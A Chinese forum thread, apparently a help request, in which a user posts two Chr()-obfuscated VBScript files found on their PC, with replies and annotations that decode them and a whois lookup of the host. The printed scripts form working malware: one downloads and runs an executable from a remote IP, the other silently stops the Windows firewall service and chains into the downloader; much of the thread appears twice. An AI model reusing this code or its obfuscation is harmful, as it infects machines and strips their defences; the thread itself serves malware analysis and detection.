计算机上抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
电脑上抓到两个可疑脚本,手头没VB,懒得手工翻译,贴代码给大家看看
在system32文件夹下:
文件1:run.vbs
内容:
' --- Analyst annotation (defender's view) ---
' Stage-1 downloader. Every string literal is built from Chr() concatenations, so
' the plaintext values are only visible after evaluating them (the replies in this
' thread do exactly that): "Wscript.shell", "Microsoft.XMLHTTP", "GET",
' "http://218.11.0.167:8080/1.exe", "ADODB.Stream", "oky.exe", "10000".
' As written: fetch a remote binary over HTTP, write it to disk via ADODB.Stream,
' wait ~10 s, then launch it through WScript.Shell.Run.
' Detection leads: wscript.exe/cscript.exe making an outbound HTTP request and then
' spawning a child process; ADODB.Stream SaveToFile writing an .exe; the host/URL
' above is a blocklist candidate (see the whois reply further down for ownership).
' "Wscript.shell"
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
' "Microsoft.XMLHTTP"
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
' "GET", "http://218.11.0.167:8080/1.exe", "0"  (third argument: synchronous request)
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
' "ADODB.Stream"
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
' "3" -> adModeReadWrite; "1" -> adTypeBinary (passed as strings, coerced by COM)
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
' Raw HTTP response body (the downloaded binary) is copied into the stream
sGet.Write(xPost.responseBody)
' "oky.exe", "2" -> adSaveCreateOverWrite. Relative path: the file lands in the
' process's current directory, which depends on how the script was launched.
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
' "10000" -> ~10 s pause before execution
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
' "oky.exe" -> executes the downloaded payload
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
文件2: run2.vbs
内容:
' --- Analyst annotation (defender's view) ---
' Stage-2 launcher, same Chr() string obfuscation as run.vbs. Decoded values:
' "Wscript.shell", "net stop sharedaccess", "%windir%\run.vbs"; the trailing "0"
' on both Run calls is the hidden-window style, so nothing is shown to the user.
' Note the poster found run.vbs under system32 while this script references
' %windir%\run.vbs; whether both copies existed is not shown in the thread.
' Detection leads: a script host stopping the SharedAccess service (Windows
' Firewall / Internet Connection Sharing) and then launching another .vbs.
' "Wscript.shell"
set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
' "net stop sharedaccess", hidden window
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
' "%windir%\run.vbs", hidden window -> chains into the stage-1 downloader
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
由于敏感字符串全部经 Chr() 拼接、没有以明文出现, 杀毒软件没有检出.
于是直接将系统的VBS文件打开方式从脚本解释器改成记事本了.
------解决方案--------------------
。。。路过,接分
------解决方案--------------------

------解决方案--------------------
------解决方案--------------------
run1.vbs
' Decoded rendering of run.vbs from the original post: the Chr() concatenations
' have been replaced by their plaintext values. String literals are shown without
' quotes, so this listing documents behaviour but would not run as written.
set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
' Synchronous GET of the remote binary (third argument 0)
xPost.Open GET,http://218.11.0.167:8080/1.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
' 3 = adModeReadWrite, 1 = adTypeBinary
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
' 2 = adSaveCreateOverWrite; relative path, written to the current directory
sGet.SaveToFile oky.exe,2
' ~10 s delay, then the downloaded file is executed
wscript.sleep 10000
oshell.run oky.exe
run2.vbs
' Decoded rendering of run2.vbs (string literals shown without quotes).
' Stops the SharedAccess service (Windows Firewall / ICS) and launches run.vbs,
' both with window style 0 (hidden).
set shell = wscript.createobject (Wscript.shell)
shell.run net stop sharedaccess,0
shell.run %windir%\run.vbs,0
------解决方案--------------------
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 218.11.0.0 - 218.12.255.255
netname: UNICOM-HE
country: CN
descr: China Unicom Hebei province network
descr: China Unicom
admin-c: CH1302-AP
tech-c: KL984-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM
在system32文件夹下:
文件1:run.vbs
内容:
' --- Analyst annotation (defender's view) ---
' Stage-1 downloader. Every string literal is built from Chr() concatenations, so
' the plaintext values are only visible after evaluating them (the replies in this
' thread do exactly that): "Wscript.shell", "Microsoft.XMLHTTP", "GET",
' "http://218.11.0.167:8080/1.exe", "ADODB.Stream", "oky.exe", "10000".
' As written: fetch a remote binary over HTTP, write it to disk via ADODB.Stream,
' wait ~10 s, then launch it through WScript.Shell.Run.
' Detection leads: wscript.exe/cscript.exe making an outbound HTTP request and then
' spawning a child process; ADODB.Stream SaveToFile writing an .exe; the host/URL
' above is a blocklist candidate (see the whois reply further down for ownership).
' "Wscript.shell"
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
' "Microsoft.XMLHTTP"
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
' "GET", "http://218.11.0.167:8080/1.exe", "0"  (third argument: synchronous request)
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
xPost.Send()
' "ADODB.Stream"
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
' "3" -> adModeReadWrite; "1" -> adTypeBinary (passed as strings, coerced by COM)
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
' Raw HTTP response body (the downloaded binary) is copied into the stream
sGet.Write(xPost.responseBody)
' "oky.exe", "2" -> adSaveCreateOverWrite. Relative path: the file lands in the
' process's current directory, which depends on how the script was launched.
sGet.SaveToFile Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
' "10000" -> ~10 s pause before execution
wscript.sleep Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
' "oky.exe" -> executes the downloaded payload
oshell.run Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
文件2: run2.vbs
内容:
' --- Analyst annotation (defender's view) ---
' Stage-2 launcher, same Chr() string obfuscation as run.vbs. Decoded values:
' "Wscript.shell", "net stop sharedaccess", "%windir%\run.vbs"; the trailing "0"
' on both Run calls is the hidden-window style, so nothing is shown to the user.
' Note the poster found run.vbs under system32 while this script references
' %windir%\run.vbs; whether both copies existed is not shown in the thread.
' Detection leads: a script host stopping the SharedAccess service (Windows
' Firewall / Internet Connection Sharing) and then launching another .vbs.
' "Wscript.shell"
set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
' "net stop sharedaccess", hidden window
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
' "%windir%\run.vbs", hidden window -> chains into the stage-1 downloader
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
由于敏感字符串全部经 Chr() 拼接、没有以明文出现, 杀毒软件没有检出.
于是直接将系统的VBS文件打开方式从脚本解释器改成记事本了.
------解决方案--------------------
。。。路过,接分
------解决方案--------------------
------解决方案--------------------
' Immediate-window style transcript: each "?<expression>" line is followed by the
' value it prints, i.e. the decoded plaintext of the Chr() chains in the two
' scripts above. This is a decoding aid, not a script.
?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)
Wscript.shell
?Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80)
Microsoft.XMLHTTP
?Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+Chr(50)+Chr(49)+Chr(56)+Chr(46)+Chr(49)+Chr(49)+Chr(46)+Chr(48)+Chr(46)+Chr(49)+Chr(54)+Chr(55)+Chr(58)+Chr(56)+Chr(48)+Chr(56)+Chr(48)+Chr(47)+Chr(49)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(48)
GET http://218.11.0.167:8080/1.exe 0
?Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109)
ADODB.Stream
?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oky.exe 2
?Chr(49)+Chr(48)+Chr(48)+Chr(48)+Chr(48)
10000
?Chr(111)+Chr(107)+Chr(121)+Chr(46)+Chr(101)+Chr(120)+Chr(101)
oky.exe
?Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)
Wscript.shell
?Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
net stop sharedaccess 0
?Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)
%windir%\run.vbs 0
------解决方案--------------------
run1.vbs
' Decoded rendering of run.vbs from the original post: the Chr() concatenations
' have been replaced by their plaintext values. String literals are shown without
' quotes, so this listing documents behaviour but would not run as written.
set oshell = wscript.createobject (Wscript.shell)
Set xPost = CreateObject(Microsoft.XMLHTTP)
' Synchronous GET of the remote binary (third argument 0)
xPost.Open GET,http://218.11.0.167:8080/1.exe,0
xPost.Send()
Set sGet = CreateObject(ADODB.Stream)
' 3 = adModeReadWrite, 1 = adTypeBinary
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
' 2 = adSaveCreateOverWrite; relative path, written to the current directory
sGet.SaveToFile oky.exe,2
' ~10 s delay, then the downloaded file is executed
wscript.sleep 10000
oshell.run oky.exe
run2.vbs
' Decoded rendering of run2.vbs (string literals shown without quotes).
' Stops the SharedAccess service (Windows Firewall / ICS) and launches run.vbs,
' both with window style 0 (hidden).
set shell = wscript.createobject (Wscript.shell)
shell.run net stop sharedaccess,0
shell.run %windir%\run.vbs,0
------解决方案--------------------
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html
inetnum: 218.11.0.0 - 218.12.255.255
netname: UNICOM-HE
country: CN
descr: China Unicom Hebei province network
descr: China Unicom
admin-c: CH1302-AP
tech-c: KL984-AP
status: ALLOCATED PORTABLE
mnt-by: APNIC-HM